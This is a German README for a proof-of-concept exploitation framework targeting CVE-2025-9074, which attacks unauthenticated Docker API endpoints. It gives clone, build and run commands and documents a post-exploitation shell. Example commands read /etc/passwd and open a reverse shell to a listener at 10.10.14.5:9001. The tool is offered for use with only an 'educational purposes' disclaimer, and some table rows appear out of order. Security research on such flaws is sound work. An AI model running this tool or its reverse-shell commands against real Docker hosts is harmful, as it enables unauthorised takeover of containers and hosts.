
Docker API CVE-2025-9074 PoC (Proof-Of-Concept). Ein ausgefeiltes Exploitation-Framework für CVE-2025-9074, das unauthentifizierte Docker-API-Endpunkte mit einer integrierten interaktiven Befehlsshell angreift.
Ein anspruchsvolles Exploitation-Framework für CVE-2025-9074, das nicht authentifizierte Docker-API-Endpunkte mit einer integrierten interaktiven Befehls-Shell angreift.
Dieses Tool automatisiert die Ausnutzung von exponierten Docker-API-Instanzen ohne Authentifizierung und ermöglicht die vollständige Container-Erstellung und Befehlsausführung auf dem Zielhost. Das Tool bietet eine benutzerdefinierte interaktive Shell für nahtlose Post-Exploitation-Operationen.
Hinweis: Dies ist eine benutzerdefinierte PoC-Implementierung. Ich habe CVE-2025-9074 nicht selbst entdeckt.

Automatisierte Schwachstellenerkennung, Image-Pull, Container-Erstellung und Initialisierung

Post-Exploitation-Shell mit Befehlsausführungsfähigkeiten
git clone https://github.com/xwpdx0/poc-2025-9074
gcc poc.c -o poc-2025-9074
oder lade die Binärdatei von Releases herunter
./poc-2025-9074
Ausführung gegen das Standardziel (127.0.0.1:2375):
./poc-2025-9074
Gib einen benutzerdefinierten Docker-API-Endpunkt an:

Nach erfolgreicher Ausnutzung bietet eine interaktive Shell die folgenden Befehle:
| Befehl | Beschreibung |
|---|---|
cmd <befehl> | Führt beliebige Befehle innerhalb des Containers aus |
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info
CVE-2025-9074 betrifft Docker-Instanzen mit exponierten API-Endpunkten, denen ordnungsgemäße Authentifizierungsmechanismen fehlen. Diese Fehlkonfiguration ermöglicht unbefugten Zugriff auf den Docker-Daemon und damit:
Dieses Tool dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests.
xwpd (@xwpdx0)
MIT-Lizenz – Weitere Details in der LICENSE-Datei
Nur für verantwortungsvolle Offenlegung und Sicherheitsforschung.
revshell <ip> <port>| Stellt eine Reverse-Shell zum angegebenen Listener bereit |
info | Zeigt aktuelle Container- und Zielinformationen an |
exit | Beendet die interaktive Sitzung |